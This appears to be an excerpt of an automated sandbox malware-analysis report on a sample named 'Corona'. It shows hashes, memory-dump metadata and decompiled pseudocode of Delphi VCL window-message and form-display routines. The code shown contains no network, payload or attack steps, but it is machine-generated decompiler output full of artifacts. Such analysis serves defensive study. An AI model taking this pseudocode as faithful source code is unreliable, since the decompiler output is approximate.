                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004052EB
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004052FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: ed610e587486814b6a3bc8edb0e0a96db485b90eae97accbd1bad58008c15f50
                                  • Instruction ID: f0b3551943a262964bae4e9a5e92ceb772aae5630afecc57578a19bc146b0e81
                                  • Opcode Fuzzy Hash: ed610e587486814b6a3bc8edb0e0a96db485b90eae97accbd1bad58008c15f50
                                  • Instruction Fuzzy Hash: F3515375A4075C7AEB21D6A49C86FEF77ACDB04744F4001BABA04F61C2D6BC9A448F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E0044CF30(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t161;
                                  				struct HWND__* _t162;
                                  				struct HWND__* _t163;
                                  				void* _t166;
                                  				struct HWND__* _t176;
                                  				struct HWND__* _t185;
                                  				struct HWND__* _t188;
                                  				struct HWND__* _t189;
                                  				struct HWND__* _t191;
                                  				struct HWND__* _t197;
                                  				struct HWND__* _t199;
                                  				struct HWND__* _t202;
                                  				struct HWND__* _t205;
                                  				struct HWND__* _t206;
                                  				struct HWND__* _t216;
                                  				struct HWND__* _t217;
                                  				struct HWND__* _t222;
                                  				struct HWND__* _t224;
                                  				struct HWND__* _t227;
                                  				struct HWND__* _t231;
                                  				struct HWND__* _t239;
                                  				struct HWND__* _t247;
                                  				struct HWND__* _t250;
                                  				struct HWND__* _t254;
                                  				struct HWND__* _t256;
                                  				struct HWND__* _t257;
                                  				struct HWND__* _t269;
                                  				intOrPtr _t272;
                                  				struct HWND__* _t275;
                                  				intOrPtr* _t276;
                                  				struct HWND__* _t284;
                                  				struct HWND__* _t286;
                                  				struct HWND__* _t297;
                                  				void* _t306;
                                  				signed int _t308;
                                  				struct HWND__* _t314;
                                  				struct HWND__* _t315;
                                  				struct HWND__* _t316;
                                  				void* _t317;
                                  				intOrPtr _t340;
                                  				struct HWND__* _t344;
                                  				intOrPtr _t366;
                                  				void* _t370;
                                  				struct HWND__* _t375;
                                  				void* _t376;
                                  				void* _t377;
                                  				intOrPtr _t378;
                                  
                                  				_t317 = __ecx;
                                  				_push(_t370);
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t377);
                                  				_push(0x44d5ea);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t378;
                                  				 *(_v12 + 0xc) = 0;
                                  				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                  				if(_t306 < 0) {
                                  					L5:
                                  					E0044CDE4(_v8, _t317, _v12);
                                  					_t308 =  *_v12;
                                  					_t161 = _t308;
                                  					__eflags = _t161 - 0x53;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0xb017;
                                  						if(__eflags > 0) {
                                  							__eflags = _t161 - 0xb020;
                                  							if(__eflags > 0) {
                                  								_t162 = _t161 - 0xb031;
                                  								__eflags = _t162;
                                  								if(_t162 == 0) {
                                  									_t163 = _v12;
                                  									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                  									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                  										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                  									} else {
                                  										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                  									}
                                  									L102:
                                  									_t166 = 0;
                                  									_pop(_t340);
                                  									 *[fs:eax] = _t340;
                                  									goto L103;
                                  								}
                                  								__eflags = _t162 + 0xfffffff2 - 2;
                                  								if(_t162 + 0xfffffff2 - 2 < 0) {
                                  									 *(_v12 + 0xc) = E0044EF7C(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
                                  								} else {
                                  									L101:
                                  									E0044CEA8(_t377); // executed
                                  								}
                                  								goto L102;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t176 = _v12;
                                  								__eflags =  *(_t176 + 4);
                                  								if( *(_t176 + 4) != 0) {
                                  									E0044DB6C(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								} else {
                                  									E0044DB10(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								}
                                  								goto L102;
                                  							}
                                  							_t185 = _t161 - 0xb01a;
                                  							__eflags = _t185;
                                  							if(_t185 == 0) {
                                  								_t188 = IsIconic( *(_v8 + 0x30));
                                  								__eflags = _t188;
                                  								if(_t188 == 0) {
                                  									_t189 = GetFocus();
                                  									_t344 = _v8;
                                  									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
                                  									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
                                  										_t191 = E00444D68(0);
                                  										__eflags = _t191;
                                  										if(_t191 != 0) {
                                  											SetFocus(_t191);
                                  										}
                                  									}
                                  								}
                                  								goto L102;
                                  							}
                                  							__eflags = _t185 == 5;
                                  							if(_t185 == 5) {
                                  								L89:
                                  								E0044E050(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t197 =  *(_v8 + 0x44);
                                  							__eflags = _t197;
                                  							if(_t197 != 0) {
                                  								_t372 = _t197;
                                  								_t199 = E00434EF4(_t197);
                                  								__eflags = _t199;
                                  								if(_t199 != 0) {
                                  									_t202 = IsWindowEnabled(E00434EF4(_t372));
                                  									__eflags = _t202;
                                  									if(_t202 != 0) {
                                  										_t205 = IsWindowVisible(E00434EF4(_t372));
                                  										__eflags = _t205;
                                  										if(_t205 != 0) {
                                  											 *0x450c20 = 0;
                                  											_t206 = GetFocus();
                                  											SetFocus(E00434EF4(_t372));
                                  											E0042F98C(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                  											SetFocus(_t206);
                                  											 *0x450c20 = 1;
                                  											 *(_v12 + 0xc) = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L102;
                                  						}
                                  						__eflags = _t161 - 0xb000;
                                  						if(__eflags > 0) {
                                  							_t216 = _t161 - 0xb001;
                                  							__eflags = _t216;
                                  							if(_t216 == 0) {
                                  								_t217 = _v8;
                                  								__eflags =  *((short*)(_t217 + 0x10a));
                                  								if( *((short*)(_t217 + 0x10a)) != 0) {
                                  									 *((intOrPtr*)(_v8 + 0x108))();
                                  								}
                                  								goto L102;
                                  							}
                                  							__eflags = _t216 == 0x15;
                                  							if(_t216 == 0x15) {
                                  								_t222 = E0044D9E8(_v8, _t317, _v12);
                                  								__eflags = _t222;
                                  								if(_t222 != 0) {
                                  									 *(_v12 + 0xc) = 1;
                                  								}
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t224 = _v8;
                                  							__eflags =  *((short*)(_t224 + 0x112));
                                  							if( *((short*)(_t224 + 0x112)) != 0) {
                                  								 *((intOrPtr*)(_v8 + 0x110))();
                                  							}
                                  							goto L102;
                                  						}
                                  						_t227 = _t161 - 0x112;
                                  						__eflags = _t227;
                                  						if(_t227 == 0) {
                                  							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                  							__eflags = _t231;
                                  							if(_t231 == 0) {
                                  								E0044D650(_v8);
                                  							} else {
                                  								__eflags = _t231 == 0x100;
                                  								if(_t231 == 0x100) {
                                  									E0044D700(_v8);
                                  								} else {
                                  									E0044CEA8(_t377);
                                  								}
                                  							}
                                  							goto L102;
                                  						}
                                  						_t239 = _t227 + 0xffffffe0 - 7;
                                  						__eflags = _t239;
                                  						if(_t239 < 0) {
                                  							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                  							goto L102;
                                  						}
                                  						__eflags = _t239 == 0x1e1;
                                  						if(_t239 == 0x1e1) {
                                  							_t247 = E004280CC(E00427FEC());
                                  							__eflags = _t247;
                                  							if(_t247 != 0) {
                                  								E00428128(E00427FEC());
                                  							}
                                  							goto L102;
                                  						} else {
                                  							goto L101;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						goto L89;
                                  					}
                                  					__eflags = _t161 - 0x16;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0x1d;
                                  						if(__eflags > 0) {
                                  							_t250 = _t161 - 0x37;
                                  							__eflags = _t250;
                                  							if(_t250 == 0) {
                                  								 *(_v12 + 0xc) = E0044D634(_v8);
                                  								goto L102;
                                  							}
                                  							__eflags = _t250 == 0x13;
                                  							if(_t250 == 0x13) {
                                  								_t254 = _v12;
                                  								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
                                  									_t256 = _v8;
                                  									__eflags =  *((char*)(_t256 + 0x9e));
                                  									if( *((char*)(_t256 + 0x9e)) != 0) {
                                  										_t257 = _v8;
                                  										__eflags =  *(_t257 + 0xa0);
                                  										if( *(_t257 + 0xa0) != 0) {
                                  											 *(_v12 + 0xc) = 0;
                                  										} else {
                                  											_t314 = E0040CBF0("vcltest3.dll", _t308, 0x8000);
                                  											 *(_v8 + 0xa0) = _t314;
                                  											__eflags = _t314;
                                  											if(_t314 == 0) {
                                  												 *(_v12 + 0xc) = GetLastError();
                                  												 *(_v8 + 0xa0) = 0;
                                  											} else {
                                  												 *(_v12 + 0xc) = 0;
                                  												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                  												_t315 = _t375;
                                  												__eflags = _t375;
                                  												if(_t375 != 0) {
                                  													_t269 =  *(_v12 + 8);
                                  													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t272 =  *0x452bb4; // 0x2131320
                                  							E0044C3E8(_t272);
                                  							E0044CEA8(_t377);
                                  							goto L102;
                                  						}
                                  						_t275 = _t161 - 0x1a;
                                  						__eflags = _t275;
                                  						if(_t275 == 0) {
                                  							_t276 =  *0x4510d4; // 0x452b10
                                  							E004396D0( *_t276, _t317,  *(_v12 + 4));
                                  							E0044CE3C(_v8, _t308, _t317, _v12, _t370);
                                  							E0044CEA8(_t377);
                                  							goto L102;
                                  						}
                                  						__eflags = _t275 == 2;
                                  						if(_t275 == 2) {
                                  							E0044CEA8(_t377);
                                  							_t284 = _v12;
                                  							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
                                  							asm("sbb eax, eax");
                                  							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
                                  							_t286 = _v12;
                                  							__eflags =  *(_t286 + 4);
                                  							if( *(_t286 + 4) == 0) {
                                  								E0044CD38();
                                  								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); // executed
                                  							} else {
                                  								E0044CD48(_v8);
                                  								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); // executed
                                  							}
                                  							goto L102;
                                  						} else {
                                  							goto L101;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						_t297 = _v12;
                                  						__eflags =  *(_t297 + 4);
                                  						if( *(_t297 + 4) != 0) {
                                  							 *((char*)(_v8 + 0x9c)) = 1;
                                  						}
                                  						goto L102;
                                  					}
                                  					__eflags = _t161 - 0x14;
                                  					if(_t161 > 0x14) {
                                  						goto L101;
                                  					}
                                  					switch( *((intOrPtr*)(_t161 * 4 +  &M0044CFD4))) {
                                  						case 0:
                                  							0 = E00418EF8(0, __ebx, __edi, __esi);
                                  							goto L102;
                                  						case 1:
                                  							goto L101;
                                  						case 2:
                                  							_push(0);
                                  							_push(0);
                                  							_push(0xb01a);
                                  							_v8 =  *(_v8 + 0x30);
                                  							_push( *(_v8 + 0x30));
                                  							L00406584();
                                  							__eax = E0044CEA8(__ebp);
                                  							goto L102;
                                  						case 3:
                                  							__eax = _v12;
                                  							__eflags =  *(__eax + 4);
                                  							if( *(__eax + 4) == 0) {
                                  								__eax = E0044CEA8(__ebp);
                                  								__eax = _v8;
                                  								__eflags =  *(__eax + 0xac);
                                  								if( *(__eax + 0xac) == 0) {
                                  									__eax = _v8;
                                  									__eax =  *(_v8 + 0x30);
                                  									__eax = E00444C18( *(_v8 + 0x30), __ebx, __edi, __esi);
                                  									__edx = _v8;
                                  									 *(_v8 + 0xac) = __eax;
                                  								}
                                  								_v8 = L0044CD40();
                                  							} else {
                                  								_v8 = E0044CD48(_v8);
                                  								__eax = _v8;
                                  								__eax =  *(_v8 + 0xac);
                                  								__eflags = __eax;
                                  								if(__eax != 0) {
                                  									__eax = _v8;
                                  									__edx = 0;
                                  									__eflags = 0;
                                  									 *(_v8 + 0xac) = 0;
                                  								}
                                  								__eax = E0044CEA8(__ebp);
                                  							}
                                  							goto L102;
                                  						case 4:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x30);
                                  							_push(__eax);
                                  							L004064F4();
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								__eax = E0044CEA8(__ebp);
                                  							} else {
                                  								__eax = E0044CEE4(__ebp);
                                  							}
                                  							goto L102;
                                  						case 5:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x44);
                                  							__eflags = __eax;
                                  							if(__eax != 0) {
                                  								__eax = E0044A5E8(__eax, __ecx);
                                  							}
                                  							goto L102;
                                  						case 6:
                                  							__eax = _v12;
                                  							 *_v12 = 0x27;
                                  							__eax = E0044CEA8(__ebp);
                                  							goto L102;
                                  					}
                                  				} else {
                                  					_t316 = _t306 + 1;
                                  					_t376 = 0;
                                  					L2:
                                  					L2:
                                  					if( *((intOrPtr*)(E004136F8( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t166 = 0;
                                  						_pop(_t366);
                                  						 *[fs:eax] = _t366;
                                  					}
                                  					L103:
                                  					return _t166;
                                  					L4:
                                  					_t376 = _t376 + 1;
                                  					_t316 = _t316 - 1;
                                  					__eflags = _t316;
                                  					if(_t316 != 0) {
                                  						goto L2;
                                  					}
                                  					goto L5;
                                  				}
                                  			}
                                  0x0044d348
                                  0x0044d34a
                                  0x0044d34c
                                  0x0044d34e
                                  0x0044d357
                                  0x0044d365
                                  0x0044d365
                                  0x0044d34e
                                  0x0044d32a
                                  0x0044d30c
                                  0x0044d2fc
                                  0x00000000
                                  0x0044d05c
                                  0x00000000
                                  0x0044d05c
                                  0x0044d056
                                  0x0044d02d
                                  0x0044d5a3
                                  0x0044d5a8
                                  0x0044d5ae
                                  0x00000000
                                  0x0044d5b3
                                  0x0044d033
                                  0x0044d033
                                  0x0044d036
                                  0x0044d583
                                  0x0044d58a
                                  0x0044d595
                                  0x0044d59b
                                  0x00000000
                                  0x0044d5a0
                                  0x0044d03c
                                  0x0044d03f
                                  0x0044d1c4
                                  0x0044d1ca
                                  0x0044d1cd
                                  0x0044d1d1
                                  0x0044d1d7
                                  0x0044d1dd
                                  0x0044d1e0
                                  0x0044d1e4
                                  0x0044d20b
                                  0x0044d220
                                  0x0044d1e6
                                  0x0044d1e9
                                  0x0044d1fe
                                  0x0044d1fe
                                  0x00000000
                                  0x0044d045
                                  0x00000000
                                  0x0044d045
                                  0x0044d03f
                                  0x0044cfbe
                                  0x0044d2c4
                                  0x0044d2c7
                                  0x0044d2cb
                                  0x0044d2d4
                                  0x0044d2d4
                                  0x00000000
                                  0x0044d2cb
                                  0x0044cfc4
                                  0x0044cfc7
                                  0x00000000
                                  0x00000000
                                  0x0044cfcd
                                  0x00000000
                                  0x0044d5d2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044d1a2
                                  0x0044d1a4
                                  0x0044d1a6
                                  0x0044d1ae
                                  0x0044d1b1
                                  0x0044d1b2
                                  0x0044d1b8
                                  0x00000000
                                  0x00000000
                                  0x0044d22a
                                  0x0044d22d
                                  0x0044d231
                                  0x0044d265
                                  0x0044d26b
                                  0x0044d26e
                                  0x0044d275
                                  0x0044d277
                                  0x0044d27a
                                  0x0044d27d
                                  0x0044d282
                                  0x0044d285
                                  0x0044d285
                                  0x0044d28e
                                  0x0044d233
                                  0x0044d236
                                  0x0044d23b
                                  0x0044d23e
                                  0x0044d244
                                  0x0044d246
                                  0x0044d24d
                                  0x0044d250
                                  0x0044d250
                                  0x0044d252
                                  0x0044d252
                                  0x0044d259
                                  0x0044d25e
                                  0x00000000
                                  0x00000000
                                  0x0044d152
                                  0x0044d155
                                  0x0044d158
                                  0x0044d159
                                  0x0044d15e
                                  0x0044d160
                                  0x0044d16f
                                  0x0044d162
                                  0x0044d163
                                  0x0044d168
                                  0x00000000
                                  0x00000000
                                  0x0044d13a
                                  0x0044d13d
                                  0x0044d140
                                  0x0044d142
                                  0x0044d148
                                  0x0044d148
                                  0x00000000
                                  0x00000000
                                  0x0044d17a
                                  0x0044d17d
                                  0x0044d184
                                  0x00000000
                                  0x00000000
                                  0x0044cf66
                                  0x0044cf66
                                  0x0044cf67
                                  0x00000000
                                  0x0044cf69
                                  0x0044cf85
                                  0x00000000
                                  0x0044cf87
                                  0x0044cf87
                                  0x0044cf89
                                  0x0044cf8c
                                  0x0044cf8c
                                  0x0044d5ff
                                  0x0044d605
                                  0x0044cf94
                                  0x0044cf94
                                  0x0044cf95
                                  0x0044cf95
                                  0x0044cf96
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044cf96

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: de8533cb725012e3b7f7eb27e251274df388a2656fc306ef6d01a75b3f260b7b
                                  • Instruction ID: 06d206e28d9f37d570c1c27d042845d046e04eaf87a1697171c6dcb53e674dc3
                                  • Opcode Fuzzy Hash: de8533cb725012e3b7f7eb27e251274df388a2656fc306ef6d01a75b3f260b7b
                                  • Instruction Fuzzy Hash: 18E15E35B00204EFFB10EB69C585A9EB7F1AF08318F2581A6E405DB752DB38EE41DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 83%
                                  			E00449F58(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				char _v12;
                                  				intOrPtr _t149;
                                  				intOrPtr _t154;
                                  				intOrPtr _t155;
                                  				intOrPtr _t160;
                                  				intOrPtr _t162;
                                  				intOrPtr _t163;
                                  				void* _t165;
                                  				struct HWND__* _t166;
                                  				long _t176;
                                  				signed int _t198;
                                  				signed int _t199;
                                  				long _t220;
                                  				intOrPtr _t226;
                                  				int _t231;
                                  				intOrPtr _t232;
                                  				intOrPtr _t241;
                                  				intOrPtr _t245;
                                  				signed int _t248;
                                  				intOrPtr _t251;
                                  				intOrPtr _t252;
                                  				signed int _t258;
                                  				long _t259;
                                  				intOrPtr _t262;
                                  				intOrPtr _t266;
                                  				signed int _t269;
                                  				intOrPtr _t270;
                                  				intOrPtr _t271;
                                  				signed int _t277;
                                  				long _t278;
                                  				intOrPtr _t281;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				long _t290;
                                  				intOrPtr _t294;
                                  				struct HWND__* _t299;
                                  				signed int _t301;
                                  				signed int _t302;
                                  				signed int _t305;
                                  				signed int _t307;
                                  				long _t308;
                                  				signed int _t311;
                                  				signed int _t313;
                                  				long _t314;
                                  				signed int _t317;
                                  				signed int _t318;
                                  				signed int _t326;
                                  				long _t328;
                                  				intOrPtr _t331;
                                  				intOrPtr _t362;
                                  				long _t370;
                                  				void* _t372;
                                  				void* _t373;
                                  				intOrPtr _t374;
                                  
                                  				_t372 = _t373;
                                  				_t374 = _t373 + 0xfffffff8;
                                  				_v12 = 0;
                                  				_v8 = __eax;
                                  				_push(_t372);
                                  				_push(0x44a4c2);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t374;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                                  					_t294 =  *0x451118; // 0x41a48c
                                  					E0040597C(_t294,  &_v12);
                                  					E0040B1B8(_v12, 1);
                                  					E00403888();
                                  				}
                                  				_t149 =  *0x452bb0; // 0x2131714, executed
                                  				E0044E66C(_t149); // executed
                                  				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                  				_push(_t372);
                                  				_push(0x44a4a5);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t374;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                  					_t155 = _v8;
                                  					_t378 =  *((char*)(_t155 + 0x1a6));
                                  					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                  						_push(_t372);
                                  						_push(0x44a3ac);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t374;
                                  						E004032F8(_v8, __eflags);
                                  						 *[fs:eax] = 0;
                                  						_t160 =  *0x452bb4; // 0x2131320
                                  						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                  						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                  							__eflags = 0;
                                  							E00449104(_v8, 0);
                                  						}
                                  						_t162 = _v8;
                                  						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                  						if( *((char*)(_t162 + 0x22f)) != 1) {
                                  							_t163 = _v8;
                                  							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                  							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                  								_t299 = 0;
                                  								_t165 = E00434EF4(_v8);
                                  								_t166 = GetActiveWindow();
                                  								__eflags = _t165 - _t166;
                                  								if(_t165 == _t166) {
                                  									_t176 = IsIconic(E00434EF4(_v8));
                                  									__eflags = _t176;
                                  									if(_t176 == 0) {
                                  										_t299 = E00444D68(E00434EF4(_v8));
                                  									}
                                  								}
                                  								__eflags = _t299;
                                  								if(_t299 == 0) {
                                  									ShowWindow(E00434EF4(_v8), 0);
                                  								} else {
                                  									SetWindowPos(E00434EF4(_v8), 0, 0, 0, 0, 0, 0x97);
                                  									SetActiveWindow(_t299);
                                  								}
                                  							} else {
                                  								SetWindowPos(E00434EF4(_v8), 0, 0, 0, 0, 0, 0x97);
                                  							}
                                  						} else {
                                  							E0043244C(_v8);
                                  						}
                                  					} else {
                                  						_push(_t372);
                                  						_push(0x44a010);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t374;
                                  						E004032F8(_v8, _t378);
                                  						 *[fs:eax] = 0;
                                  						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                  							if( *((char*)(_v8 + 0x22f)) != 1) {
                                  								_t301 = E0044B7F0() -  *(_v8 + 0x48);
                                  								__eflags = _t301;
                                  								_t302 = _t301 >> 1;
                                  								if(_t301 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t198 = E0044B7E4() -  *(_v8 + 0x4c);
                                  								__eflags = _t198;
                                  								_t199 = _t198 >> 1;
                                  								if(_t198 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							} else {
                                  								_t241 =  *0x452bb0; // 0x2131714
                                  								_t305 = E0042E1F8( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                  								_t302 = _t305 >> 1;
                                  								if(_t305 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t245 =  *0x452bb0; // 0x2131714
                                  								_t248 = E0042E23C( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                  								_t199 = _t248 >> 1;
                                  								if(_t248 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							}
                                  							if(_t302 < 0) {
                                  								_t302 = 0;
                                  							}
                                  							if(_t199 < 0) {
                                  								_t199 = 0;
                                  							}
                                  							_t326 = _t199;
                                  							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  							if( *((char*)(_v8 + 0x57)) != 0) {
                                  								E004483B4(_v8, _t326);
                                  							}
                                  						} else {
                                  							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                  							__eflags = _t251 + 0xfa - 2;
                                  							if(_t251 + 0xfa - 2 >= 0) {
                                  								__eflags = _t251 - 5;
                                  								if(_t251 == 5) {
                                  									_t252 = _v8;
                                  									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                  									if( *((char*)(_t252 + 0x22f)) != 1) {
                                  										_t307 = E0044B820() -  *(_v8 + 0x48);
                                  										__eflags = _t307;
                                  										_t308 = _t307 >> 1;
                                  										if(_t307 < 0) {
                                  											asm("adc ebx, 0x0");
                                  										}
                                  										_t258 = E0044B814() -  *(_v8 + 0x4c);
                                  										__eflags = _t258;
                                  										_t259 = _t258 >> 1;
                                  										if(_t258 < 0) {
                                  											asm("adc eax, 0x0");
                                  										}
                                  									} else {
                                  										_t262 =  *0x452bb0; // 0x2131714
                                  										_t311 = E0042E1F8( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                  										__eflags = _t311;
                                  										_t308 = _t311 >> 1;
                                  										if(_t311 < 0) {
                                  											asm("adc ebx, 0x0");
                                  										}
                                  										_t266 =  *0x452bb0; // 0x2131714
                                  										_t269 = E0042E23C( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                  										__eflags = _t269;
                                  										_t259 = _t269 >> 1;
                                  										if(_t269 < 0) {
                                  											asm("adc eax, 0x0");
                                  										}
                                  									}
                                  									__eflags = _t308;
                                  									if(_t308 < 0) {
                                  										_t308 = 0;
                                  										__eflags = 0;
                                  									}
                                  									__eflags = _t259;
                                  									if(_t259 < 0) {
                                  										_t259 = 0;
                                  										__eflags = 0;
                                  									}
                                  									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  								}
                                  							} else {
                                  								_t270 =  *0x452bb0; // 0x2131714
                                  								_t370 =  *(_t270 + 0x44);
                                  								_t271 = _v8;
                                  								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                  								if( *((char*)(_t271 + 0x230)) == 7) {
                                  									_t362 =  *0x4436a0; // 0x4436ec
                                  									_t290 = E00403288( *(_v8 + 4), _t362);
                                  									__eflags = _t290;
                                  									if(_t290 != 0) {
                                  										_t370 =  *(_v8 + 4);
                                  									}
                                  								}
                                  								__eflags = _t370;
                                  								if(_t370 == 0) {
                                  									_t313 = E0044B7F0() -  *(_v8 + 0x48);
                                  									__eflags = _t313;
                                  									_t314 = _t313 >> 1;
                                  									if(_t313 < 0) {
                                  										asm("adc ebx, 0x0");
                                  									}
                                  									_t277 = E0044B7E4() -  *(_v8 + 0x4c);
                                  									__eflags = _t277;
                                  									_t278 = _t277 >> 1;
                                  									if(_t277 < 0) {
                                  										asm("adc eax, 0x0");
                                  									}
                                  								} else {
                                  									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                  									__eflags = _t317;
                                  									_t318 = _t317 >> 1;
                                  									if(_t317 < 0) {
                                  										asm("adc ebx, 0x0");
                                  									}
                                  									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                  									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                  									__eflags = _t286;
                                  									_t287 = _t286 >> 1;
                                  									if(_t286 < 0) {
                                  										asm("adc eax, 0x0");
                                  									}
                                  									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                  								}
                                  								__eflags = _t314;
                                  								if(_t314 < 0) {
                                  									_t314 = 0;
